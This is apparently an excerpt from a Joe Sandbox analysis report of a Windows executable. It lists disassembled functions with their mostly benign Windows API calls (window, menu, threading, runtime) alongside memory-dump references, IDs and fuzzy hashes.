                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CountItemStringWindow_wcslen
                                                                              • String ID:
                                                                              • API String ID: 1823500076-0
                                                                              • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                              • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                              • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                              • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                              Function 00448877 Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$MessageMoveSend
                                                                              • String ID:
                                                                              • API String ID: 896007046-0
                                                                              • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                              • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                              • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                              • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                              Function 004413F0 Relevance: 10.6, APIs: 7, Instructions: 114windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                              • SendMessageW.USER32(02FF1A78,000000F1,00000000,00000000), ref: 004414C6
                                                                              • SendMessageW.USER32(02FF1A78,000000F1,00000001,00000000), ref: 004414F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 312131281-0
                                                                              • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                              • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                              • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                              • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                              Function 0044849C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004484C4
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                              • IsMenu.USER32(?), ref: 0044857B
                                                                              • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                              • DrawMenuBar.USER32 ref: 004485E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                              • String ID: 0
                                                                              • API String ID: 3866635326-4108050209
                                                                              • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                              • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                              • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                              • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                              Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                              • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                              • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                              • String ID: 0vH
                                                                              • API String ID: 327565842-3662162768
                                                                              • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                              • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                              • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                              • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                              Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                              • GetFocus.USER32 ref: 00448B1C
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$FocusMessageSend
                                                                              • String ID:
                                                                              • API String ID: 3429747543-0
                                                                              • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                              • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                              • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                              • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                              Function 00401BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • _memset.LIBCMT ref: 00401C62
                                                                              • _wcsncpy.LIBCMT ref: 00401CA1
                                                                              • _wcscpy.LIBCMT ref: 00401CBD
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                              • String ID: Line:
                                                                              • API String ID: 1620655955-1585850449
                                                                              • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                              • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                              • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                              • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                              Function 0045D321 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                              • __swprintf.LIBCMT ref: 0045D3CC
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu$HH
                                                                              • API String ID: 3164766367-3924996404
                                                                              • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                              • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                              • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                              • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                              Function 00450DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 3850602802-3636473452
                                                                              • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                              • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                              • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                              • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                              Function 00455449 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                              • String ID:
                                                                              • API String ID: 3985565216-0
                                                                              • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                              • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                              • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                              • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                              Function 00415702 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                              • __calloc_crt.LIBCMT ref: 00415743
                                                                              • __getptd.LIBCMT ref: 00415750
                                                                              • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                              • __dosmaperr.LIBCMT ref: 004157A9
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1269668773-0
                                                                              • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                              • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                              • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                              • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                              Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                              • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              • API String ID: 1957940570-0
                                                                              • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                              • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                              • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                              • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                              Function 0041568B Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                              • ExitThread.KERNEL32 ref: 004156BD
                                                                              • __freefls@4.LIBCMT ref: 004156D9
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                              • String ID:
                                                                              • API String ID: 4166825349-0
                                                                              • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                              • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                              • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                              • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                              Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                              • API String ID: 2574300362-3261711971
                                                                              • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                              • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                              • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                              • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                              Function 0047B1D0 Relevance: 9.5, APIs: 6, Instructions: 489COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
